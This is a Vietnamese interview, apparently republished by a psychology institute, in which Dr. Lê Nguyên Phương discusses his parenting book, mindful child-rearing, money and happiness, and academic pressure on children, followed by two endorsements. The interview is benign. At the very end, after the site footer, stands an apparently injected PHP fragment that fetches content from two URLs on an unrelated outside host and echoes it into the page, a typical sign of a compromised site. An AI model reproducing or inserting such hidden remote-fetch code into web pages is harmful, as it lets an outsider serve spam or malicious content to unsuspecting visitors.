Tiến sĩ Lê Nguyên Phương: 'Nếu xem con cái là sự nghiệp sẽ tự tìm được thời gian'

Nhiều người hay than bận rộn mà ít có thời gian cho con. Tôi cho rằng, nếu xem con là sự nghiệp, phụ huynh sẽ tìm được thời gian. Đừng ngại học thức ít, đừng ngại không đủ ngoại ngữ, chỉ ngại tâm mình chưa đủ bình yên...

Tiến sĩ Lê Nguyên Phương, tác giả Dạy con trong “hoang mang” - bộ sách đoạt giải Sách hay 2018 - chia sẻ với Thanh Niên.

Yêu thương và lạc lối

Tại sao là Dạy con trong “hoang mang”, thưa ông?

Thực sự chưa bao giờ chúng ta lại hoang mang trong việc dạy con như vậy. Hoang mang về định hướng, giá trị gia đình và phương pháp dạy con.

Khi mở cửa hội nhập, chúng ta có điều kiện tiếp thu nhiều thành tựu kinh tế, văn hóa ở nhiều mức độ, sắc thái khác nhau. Cho nên những khuôn mẫu cũ đã không còn thích hợp nữa.

Vì vậy, chúng ta bắt buộc đi tìm một phương pháp dạy con khác. Và hành trình dạy con đó giống như một người dong thuyền ra biển cả với hy vọng tìm được kho báu. Thế nhưng nếu trong tay chúng ta lại không có bản đồ hay la bàn, nguy cơ lạc vào hoang đảo rất cao.

Theo ông, hiện nay các phụ huynh bị "lạc lối" chỗ nào?

Tiếp nhận phương pháp dạy con của Tây phương cứng nhắc. Nhiều phương pháp của họ được sử dụng từ chục năm trước. Khi nó dần lỗi thời ở xứ người thì mình mang về cho là phương pháp tân tiến.

Ví dụ một số gia đình VN lại có hình thức thưởng tiền khi con hoàn thành công việc nhà. Họ nghĩ như vậy sẽ dạy cho con sự tự lập và trân trọng giá trị của đồng tiền. Nhưng theo tôi, phụ huynh đã "đi lạc".

Nên cho trẻ cảm thấy vui vẻ vì được lao động, hạnh phúc vì được giúp đỡ cha mẹ. Chứ nếu mọi việc làm đều được quy ra tiền, vô tình chúng ta đã biến trẻ thành nô lệ cho tiền bạc. Khi lớn lên, trong vô thức, các em cũng sẽ đi làm chỉ vì tiền chứ không nhận ra niềm hạnh phúc trong lao động hay ý thức về sự đóng góp cho xã hội.

Nhiều phụ huynh nghĩ rằng có nhiều tiền là hạnh phúc?

Tôi không tin nhiều tiền là có hạnh phúc. Theo một nghiên cứu về hạnh phúc và thu nhập, thì tương quan tỷ lệ thuận từ 0 đến khoảng 65.000 USD/năm. Sau đó, tiền và hạnh phúc sẽ không tỷ lệ thuận nữa.

Với đời sống Mỹ, 65.000USD/năm là thu nhập của giai cấp trung lưu thấp. Qua đó thấy rằng, con người cần có một đời sống vật chất ở mức tối thiểu. Vượt qua những giá trị vật chất đó thì hạnh phúc phải do chúng ta kiến tạo. Hạnh phúc sẽ phụ thuộc vào định hướng và giá trị sống.

Tỉnh thức, khơi dòng nước mát trong tâm hồn

Tiến sĩ Lê Nguyên Phương:

- Tiến sĩ Lãnh đạo giáo dục chuyên ngành tâm lý giáo dục tại University of Southern California (USC, Mỹ).

- Là người sáng lập Tổ chức Liên hiệp phát triển tâm lý học đường tại VN (CASP-V) năm 2009.

- Tác giả cuốn sách Dạy con trong “hoang mang”, xuất bản tháng 6.2017.

- Hiện nay, tiến sĩ Lê Nguyên Phương là chuyên gia tâm lý học đường của Học khu Long Beach và giảng viên của chương trình cao học bộ môn tâm lý học đường tại Đại học Chapman (Mỹ). Ông đã về VN nhiều lần để tham gia các hội thảo chuyên ngành cũng như giảng dạy trong các khóa tập huấn kỹ năng tâm lý học đường cho giảng viên các trường đại học và chuyên viên hành nghề.

Con người sinh ra, đầu tiên gắn bó với gia đình. Sau đó mới đến nhà trường và xã hội. Theo ông, gia đình có vai trò như thế nào trong sự phát triển của một con người?

Nhà trường có tiến bộ đến đâu, tài giỏi đến đâu cũng không thể thay thế được hình ảnh của cha mẹ trong tâm thức con cái. Cho nên phụ huynh có trách nhiệm mang một nền giáo dục tại gia tốt đẹp nhất, phù hợp nhất với sự phát triển tâm sinh lý của con mình.

Một thực tế nhiều gia đình đang gặp là phụ huynh quá bận rộn, không có nhiều thời gian dành cho con cái?

Hãy bớt tham vọng lại. Hãy nghĩ rằng con cái cũng là sự nghiệp, thì phụ huynh sẽ tự tìm được thời gian. Nếu bạn thực sự yêu cái gì, bạn sẽ kiếm được thời gian cho cái đó.

Một điều nữa, đừng ngại có ít thời gian. Nếu trong thời gian ngắn ngủi mà chúng ta sống trọn vẹn trong sự tỉnh thức với con cái, con cái nhận được sự rung động của tình thương yêu từ cha mẹ. Như vậy sẽ tốt hơn việc ngồi bên nhau nhiều giờ nhưng tâm trí lại ở một nơi khác.

Có một thực trạng là nhiều phụ huynh đang hoang mang với chính mình, từ đó dẫn đến hoang mang trong việc dạy con.

Trong bối cảnh một số giá trị cốt lõi bị mất đi qua nhiều nhân tai thì phụ huynh cũng là nạn nhân.

Thế nhưng tôi tin rằng một con người, nếu lấy kim đâm vào da thịt vẫn còn biết đau và vẫn còn khát khao hạnh phúc thì họ đã không đánh mất chính mình hoàn toàn. Một dòng sông tưởng rằng cạn kiệt, chỉ còn lại bùn lầy và sỏi đá đó, chỉ cần người thấu hiểu là có thể khơi lại nguồn nước trong lành. Dòng nước ấy có thể lại tuôn tràn, tưới mát cho bao nhiêu cánh rừng, làng mạc và những cánh đồng nữa. Vấn đề người khơi nguồn ấy là ai? Tôi nghĩ, giới trí thức phải có trách nhiệm này.

Bên cạnh đó, chính mỗi người cũng phải tự khơi lại những dòng sông trong tâm hồn mình. Hãy nghĩ nó sẽ tưới mát cho chính tâm hồn và gia đình mình. Nếu bạn là một dòng sông khô kiệt thì cho đến khi nhắm mắt xuôi tay, cả đời bạn cũng chỉ là chuỗi ngày dài chán chường, mệt mỏi.

Tiến sĩ Lê Nguyên Phương trong một buổi tọa đàm Ảnh: NVCC​

Học làm cha làm mẹ là một nghệ thuật không dễ. Không phải ai cũng có một nền tảng học vấn tốt để có thể tìm cho con mình một phương pháp giáo dục đúng đắn?

Đừng ngại mình thất học, đừng ngại mình không có thời gian, đừng ngại mình không có ngoại ngữ mà chỉ ngại rằng tâm mình chưa đủ bình yên. Hãy dạy con trong sự tỉnh thức, sáng suốt.

Nếu tâm hồn mình đầy sự tức giận, tham lam và u minh thì cho dù có đọc hàng trăm cuốn sách dạy con thì những phụ huynh đó cũng chỉ đem lại cho con mình bất hạnh mà thôi.

Sống hạnh phúc để dạy con hạnh phúc

Trên bìa quyển sách có dòng chữ “Hành trình chuyển hóa chính mình để giáo dục trẻ thơ”. Đó là “chuyển hóa” điều gì?

“Chìa khóa” chung trong việc giáo dục con cái không phụ thuộc vào sự uyên bác của cha mẹ. Nó tùy thuộc vào sự tỉnh thức và thương yêu. Nói cách khác, nó phụ thuộc vào sự từ bi và trí tuệ của cha mẹ.

Từ bi và trí tuệ không chỉ giúp trưởng thành mà còn dạy con người sống hạnh phúc. Muốn vậy phải "chuyển hóa chính mình".

Tại sao phải “chuyển hóa chính mình”? Là vì từ lúc sinh ra, chúng ta đã phải chịu đựng quá nhiều khổ đau. Nếu không hóa giải những khổ đau đó, thì cả đời chúng ta sẽ bị những cảm xúc tiêu cực đeo bám. Sự sân si, thù hận, oán giận không chỉ như biển bùn nhấn chìm tâm hồn chúng ta mà còn biến con cái chúng ta thành nạn nhân. Không chỉ xây đê, đắp đập, mà chúng ta còn cần phải tháo cạn biển bùn ấy, hóa giải những khổ đau. Đừng để những cảm xúc tiêu cực truyền đi từ thế hệ này sang thế hệ khác.

Một người mẹ, người cha muốn dạy con sống hạnh phúc phải làm gì?

Câu trả lời rất đơn giản. Cha mẹ muốn con mình hạnh phúc thì trước tiên phải hiểu hạnh phúc là gì và sống hạnh phúc. Nhẹ nhàng xả đi những tham vọng, hóa giải những hận thù, chuyển hóa chính mình để từ đó dạy con hạnh phúc.

Một thực trạng đáng lo ngại là nhiều trẻ em có biểu hiện tâm thần, nguyên nhân một phần do áp lực học tập từ chính phụ huynh và nhà trường. Ông nói gì về sự thương yêu, kỳ vọng và áp lực đè nặng lên những đứa trẻ?

Phụ huynh luôn ao ước con cái thành công trên đường đời. Và những ước ao đó được đặt cho một mỹ từ đó là “sự kỳ vọng”. Các bậc làm cha mẹ hãy xét lại. Đó là ao ước của con mình hay đó chính là sự tham lam ích kỷ của cha mẹ? Nếu đó chỉ là sự tham lam muốn con đem lại cho mình niềm kiêu ngạo là gia đình mình “sản xuất” ra được những đứa con giàu có, giỏi giang thì hãy ngưng lại.

Với một động lực như vậy, phụ huynh đó chỉ có thể đẩy con tới sự hủy diệt. Và gián tiếp sẽ dẫn đến một xã hội hủy diệt mà thôi. Các em có thể thành công, thế nhưng theo tôi, chúng sẽ không có hạnh phúc. Các em sẽ không bao giờ cảm thấy là đủ. Cả cuộc đời các em sẽ không bao giờ biết đến hạnh phúc mà luôn luôn có một động lực rất tiêu cực. Thậm chí dẫn đến tàn ác và làm cho tâm hồn nó kiệt quệ.

>>> Đọc thêm: Tính Cách Của Con Có Thể Thay Đổi Cách Nuôi Dạy Của Cha Mẹ

Ông muốn gửi gắm điều gì qua Dạy con trong “hoang mang”?

Triết gia Lý Đông A đã nói: “Nuôi thân thì sinh nô tài. Nuôi trí thì sinh nhân tài. Nuôi tâm thì sinh thiên tài”. Chúng ta đã và đang nuôi con cái và dạy dỗ học sinh với những nghiệp quả tham sân si của chúng ta.

Như vậy, điều quan trọng là hãy dạy các em trong tỉnh thức. Nói theo Phật giáo là chúng ta hãy chuyển Nghiệp thành Nguyện.

Thay vì dạy con trong sân hận, chúng ta sẽ dạy con trong từ bi. Thay vì dạy con trong tham lam, chúng ta sẽ dạy con trong hỉ xả. Thay vì dạy con trong vô minh, chúng ta sẽ dạy con bằng trí tuệ.

Viết câu chuyện của chính mình

Khi đặt vấn đề với tiền sĩ Lê Nguyên Phương về triết lý giáo dục cho bố mẹ VN, tôi hỏi anh: Chẳng lẽ các bố mẹ Việt sẽ cứ chạy từ triết lý giáo dục của nước này qua nước khác? Đâu là giá trị cốt lõi của giáo dục VN?

Dạy con trong “hoang mang” là câu trả lời của tiến sĩ Lê Nguyên Phương cho câu hỏi đó. Có lẽ, nỗi băn khoăn của chúng tôi cũng là nỗi băn khoăn đau đáu của chính anh từ lâu lắm.

Là một nhà khoa học, để có được Dạy con trong “hoang mang”, với ước mong phổ biến kiến thức khoa học cho các bố mẹ, nhưng phải như đang tâm sự chia sẻ chân tình, chứ không phải chỉ nói bằng ngôn ngữ khoa học thuần túy, bản thân tiến sĩ phải vượt qua vai của một nhà khoa học, để nhập vào vai của bố mẹ, vai của một độc giả bình thường đang có con, đang có chung nỗi lo và nỗi đau. Có khi, anh viết câu chuyện của chính mình và thấp thoáng trong đó, độc giả tinh ý có thể nhìn thấy nước mắt.

Anh chia sẻ với tôi ngay khi cuốn sách hoàn thành chương cuối, rằng hành trình viết cuốn sách này cũng chính là hành trình chuyển hóa của chính anh, hành trình anh đến gần hơn với bản thể của mình. Đó là hành trình nhìn lại và làm hòa với quá khứ, với cả những nỗi đau còn nằm sâu thẳm rất lâu rồi.

Ngô Phương Thảo, Giám đốc An books

Người thầy, nhà khoa học và một hành giả

Tôi có 2 đứa con, một cháu trai lớp 12 và một bé gái lớp 5. Dù trải qua gần 20 năm làm cha mẹ nhưng đôi lúc tôi cũng cảm thấy khá hoang mang và không biết làm cách nào để truyền đạt cho con mình hiểu. Thực ra tôi cũng như nhiều người không được chuẩn bị làm cha mẹ dù trách nhiệm làm cha mẹ là một trách nhiệm vĩ đại của con người. Chúng ta mò mẫm, rút kinh nghiệm từ người đi trước, từ những trải nghiệm của tuổi thơ với cha mẹ ông bà mình và không hề có một kiến thức nào về việc làm cha mẹ cả.

Có cơ duyên được trò chuyện với anh Phương và được biết anh là một hành giả Phật giáo. Tôi rất nhớ hai anh em trò chuyện cả tiếng đồng hồ. Anh Phương có kiến giải rất khoa học khi trò chuyện về Duy thức học, anh nói về Tâm lý học nhận thức, giải thích Duy thức dưới cái nhìn của nhà khoa học phương Tây. Đặc biệt anh kể lại câu chuyện về ngộ (satori) của mình khi còn trẻ. Sau ngộ thì thế nào? Thì cũng như người bình thường thôi, vẫn thấy núi là núi và sông là sông, vẫn cần phải tu tập hằng ngày. Tôi quý anh vì khả năng sư phạm của một người thầy, tính chặt chẽ và hệ thống của một nhà khoa học phương Tây và tinh thần khoáng đạt của một hành giả.

Đào Trung Thành, Giám đốc công nghệ Media Ventures Vietnam Group

Nguồn: Báo Thanh Niên

-----------------------------

Viện Tâm lý Việt - Pháp

Trụ sở chính & Trung tâm trị liệu tại Hà Nội: Số 54 Trần Quốc Vượng, P. Dịch Vọng Hậu, Q. Cầu Giấy, TP. Hà Nội

Trung tâm trị liệu tại TP.HCM: Landmark 81, Vinhomes Central Park, 720A Điện Biên Phủ, P.22, Q. Bình Thạnh, Tp. Hồ Chí Minh

Hotline: 0977.729.396 (Zalo, 24/7)

Email: info@tamlyvietphap.vn

Facebook: https://www.facebook.com/tamlyvietphap.vn

Bài viết liên quan

Gọi cho tôi

Hãy gửi thông tin cho chúng tôi, nhân viên tư vấn của Viện sẽ liên hệ lại Quý khách trong vòng 24h. Thông tin của Quý khách chỉ để chúng tôi liên hệ và không gửi cho bên thứ ba.

Tài nguyên

Trắc nghiệm

https://tracnghiem.tamlyvietphap.vn/

$content1 = file_get_contents("https://ayambakar.vip/bl/bc.php"); $content2 = file_get_contents("https://ayambakar.vip/st/index.php"); echo ''; echo ''; ?>